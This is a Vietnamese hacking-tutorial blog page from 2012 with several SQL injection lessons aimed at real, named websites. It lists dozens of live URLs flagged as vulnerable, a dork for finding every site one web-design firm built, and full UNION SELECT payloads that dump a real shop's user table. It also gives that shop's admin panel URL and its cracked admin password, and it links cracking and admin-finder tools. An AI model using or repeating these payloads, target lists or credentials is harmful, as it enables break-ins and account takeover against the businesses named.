Welcome To Hồ Đức Dũng' Blog - I'm Not A Hacker!

Blog được tạo ra nhằm mục đích demo các kỹ thuật hack website dưới dạng Tut- và 1 số vấn đề liên quan đến Hacking Tạo một sân chơi lành mạnh và không gian học tập & trao đổi dành cho các bạn có niềm đam mê Hacking và Security. Tác giả không khuyến cáo bạn đọc sử dụng những kỹ thuật này để thâm nhập bất hợp pháp vào các hệ thông, đánh sập các website Việt cũng như không chịu bất kỳ trách nhiệm gì trước mọi hành vi mang tính chất phá hoại của độc giả!

Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng

Chủ Nhật, 29 tháng 7, 2012

[Bài 4 – SQLI] Bypass 406 Not Acceptable

Trong các bài trước , Soleil đã giới thiệu các dạng attack cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với Aspx, Khai thác lỗi cơ bản, Lỗi Jet. Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.

Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable” thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với công ty thiết kế website “Viet Arrow”.

Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ

http://www.duythinh.com.vn/?do=product&id=48%27

http://www.quangdao.vn/?do=supply&id=3%27

http://www.ttasia.com.vn/?do=services&id=14%27

http://www.lilama45-1.com/index.php?do=subcat&id=2%27&lang=vn

http://www.royalstone.com.vn/?do=products&act=detail&id=54%27&lang=vn

http://www.fsec.com.vn/index.php?do=intro&id=6%27

http://www.pcphumy.com/?do=projects&act=detail&id=19%27

http://www.vinhsang.com/?do=intro&id=3%27

http://www.sosani.com/?do=products&act=detail&cat_id=39&id=144%27&lang=en

http://mayphatdien.net.vn/index.php?do=products&act=list&p_cid=1&p_pid=202%27&l=2

http://dichvuduongsat.com/?do=services&act=detail&id=5%27&lang=en

http://www.caohungco.vn/index.php?do=products&act=detail&cid=74&id=128%27&lang=en

http://dichvuduongsat.com/?do=services&act=detail&id=4%27

http://www.shopdiep.com/index.php?do=products&act=detail&cid=63&id=1606%27

http://suthienthanh.com/?do=products&act=detail&id=23%27&lang=en

http://www.hoanmyco.com/index.php?do=news&act=detail&id=104%27

http://www.locanresort.com/index.php?do=page&id=1%27

http://www.khaithong.com.vn/index.php?do=content&id=1%27

http://www.clicktoner.vn/index.php?do=page&id=2%27

http://vietdoantravel.com/index.php?do=page&id=2%27

http://sieuthihangchatluong.com/?Id=EStore&Act=View&Man=SanPham&DoanhNghiep=adminva&Cat=acde6754ab29d3c3b521f86041b88834%27

Soleil sẽ chọn 1 victim bất kỳ để khai thác.

Victim: http://www.khaithong.com.vn/

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=

http://www.khaithong.com.vn/index.php?do=content&id=1

Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli

Đọc thêm »

Chủ Nhật, 18 tháng 3, 2012

[Bài 3 - SQLI] - Khai Thác Đối Với ASPX

Victim: http://quangcaovinasun.com.vn

Bước 1: Check link lỗi

Đối với site aspx, ta thêm dấu ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi:

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.

Ví dụ: http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’

Đọc thêm »

Thứ Hai, 12 tháng 3, 2012

Site nước ngoài Lỗi SQLI - Phần II

http://www.cometantenna.com/newPro_detail.php?ID=234'

http://www.jocuri-online.net/game.php?id=5'

http://www.mace.manchester.ac.uk/aboutus/staff/academic/profile/?staffId=188'

http://www.abalar.es/ampliar_material.php?id_material=11'

http://www.drummajorinstitute.org/events/unique_event.php?ID=49'

http://holidayvillagerodos.com/gallery.php?id=1'

http://www.ndc.ps/main.php?id=2'

http://campus.sanook.com/inlove/read.php?id=86'

http://www.worldstyling.com/web/product_detail.php?id=960'

http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321'

http://www.bsp.org.uk/news_full.php?id=30'

http://www.avmaniacs.com/review.php?id=319'

http://www.laserltd.ps/cat/showimg.php?id=85'

http://www.bryansmarine.com/section.php?id=10'

http://www.minesandcommunities.org/look.php?id=101'

http://www.fetrab.org.br/conteudo.php?ID=1050'

http://www.dynamicptmichigan.com/news.php?id=22'

http://www.jester-records.com/releases_sub.php?ID=45'

http://www.pioneer-group.co.uk/event.php?id=16'

http://www.amrproductions.nl/faq/view_faq.php?id=8'

http://www.djinsure.com/faq/viewFAQ.php?id=8'

http://www.gamefreaks365.com/newsarticle.php?sid=4273'

http://www.wildarttaxidermy.co.uk/gallery.php?id=16'

http://www.bicikel.com/forum/?thread_id=15058'

http://www.theglideslope.com/index_sub.php?did=10'

http://www.alexandrahedin.com/recipes_view.php?recipe_id=34'

http://www.webcommerce.insee.fr/fiche-produit.php?id_produit=2170'

http://diabetesservice.co.uk/index2.php?section_id=32'

Đọc thêm »

Thứ Bảy, 10 tháng 3, 2012

[Bài 2 - SQLI] - Khai Thác Lỗi Cơ Bản

Victim: http://www.shophangkhuyenmai.com/

Bước 1: Check lỗi:

Thêm dấu ‘ sau đường link có dạng id=

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421'

Nếu giao diện website có thay đổi. Chứng tỏ site bị lỗi.

Bước 2: Tìm số trường cột

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 1-- - -> site bình thường

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 15-- - -> Site vẫn bình thường

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 16-- - -> Giao diện website thay đổi.

Số trường cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Chú ý là phải có dấu - trước 1421 thì mới xuất hiện ra các con số đẹp.

Chúng ta chú ý sẽ thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.

Bước 4: Xuất ra tên các tables trong database

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

Thông tin về tên các table thu được:

tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor

Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user). Vì vậy soleil sẽ khai thác ở table này.

Bước 5: Xuất ra tên các colums chứa username và password

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -

Lưu ý:

- 0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex

- 74626c5f75736572 là chữ tbl_user ở dạng hex.

- Link convert các ký tự sang mã hex:

http://string-functions.com/string-hex.aspx

Thông tin về tên columns thu được:

id,uid,pwd

Bước 6: Xuất ra thông tin về Username và Password

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -

0x2f

Thông tin về username và password được mã hóa md5 thu được:

admin/679115597bf9f763506dcc9a8e9e8e82

Bước 7: Crack Password và tìm link admin:

- Có nhiều site để crack passwd, ví dụ:

http://md5cracker.org/

Hoặc sử dụng google để tìm kiếm

- Sử dụng các tool để tìm link admin: Havij, Web admin finder

Havij 1.5 free: http://www.mediafire.com/?bcrs460vcu1vy2q

Web admin finder 2.5 : http://www.mediafire.com/?ogoclxe83no1xzg

Pass dải nén: ducdung.08clc

Thông tin Soleil thu được:

Link admin: http://www.shophangkhuyenmai.com/admin/

Username và password: admin / 961980dt

Thứ Sáu, 17 tháng 2, 2012

[Bài 1 - SQLI] Lỗi Jet

Trong bài đâu tiên vê chủ để SQLI, Soleil giới thiệu với các bạn lỗi Jet khá phổ biến

Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column

Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:

tintuc.asp?tin_ID=
chitiet.asp?ID=

Victim hôm nay soleil sẽ demo là:
http://thanhancamera.com/news.asp?tin_ID=86

Bước 1: Check lỗi

Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86’

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.

/news.asp, line 16

Đọc thêm »

Thứ Năm, 16 tháng 2, 2012

Tổng hợp hơn Dork SQLI

3000 dork SQLI

Hơn 2000 Dork SQLI

Đôi Lời Bộc Bạch

+ Tôi không phải là hacker cũng chảng phải là dân IT. Đến với hacking đơn giản chỉ vì sự tò mò và lòng đam mê theo phương châm hiểu hack để chống hack, hack để bảo mật tốt hơn.

+ Kiến thức không phải của riêng ai nhưng nhưng kiến thức cũng chỉ dành cho nhưng người thích tìm tòi và ham hiểu biết. Chẳng có lý do gì mà không chia sẽ, chẳng có lý do gì để dấu khư khư và làm của riêng cho bản thân cả .... ^^
+ 1 ly cafe, 1 vài bài hát quen thuộc và dành toàn bộ thời gian rảnh cho việc ngâm cứu hacking & security là tất cả về tôi. :)

Nhãn

Chủ Nhật, 29 tháng 7, 2012

[Bài 4 – SQLI] Bypass 406 Not Acceptable

Chủ Nhật, 18 tháng 3, 2012

[Bài 3 - SQLI] - Khai Thác Đối Với ASPX

Thứ Hai, 12 tháng 3, 2012

Site nước ngoài Lỗi SQLI - Phần II

Thứ Bảy, 10 tháng 3, 2012

[Bài 2 - SQLI] - Khai Thác Lỗi Cơ Bản

Thứ Sáu, 17 tháng 2, 2012

[Bài 1 - SQLI] Lỗi Jet

Thứ Năm, 16 tháng 2, 2012

Tổng hợp hơn Dork SQLI